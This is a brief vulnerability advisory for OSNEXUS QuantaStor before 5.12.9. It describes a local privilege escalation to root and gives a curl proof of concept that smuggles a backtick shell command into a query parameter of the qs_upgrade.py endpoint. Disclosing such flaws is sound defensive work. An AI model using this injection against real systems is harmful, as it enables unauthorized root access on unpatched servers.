Advisory

Upgrade to the latest version of OSNexus Quantastor;

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. There is a local privilege escalation to root. Finding a SSRF could make this a remote code execution.

curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami>/tmp/aaa`'
Privilege escalation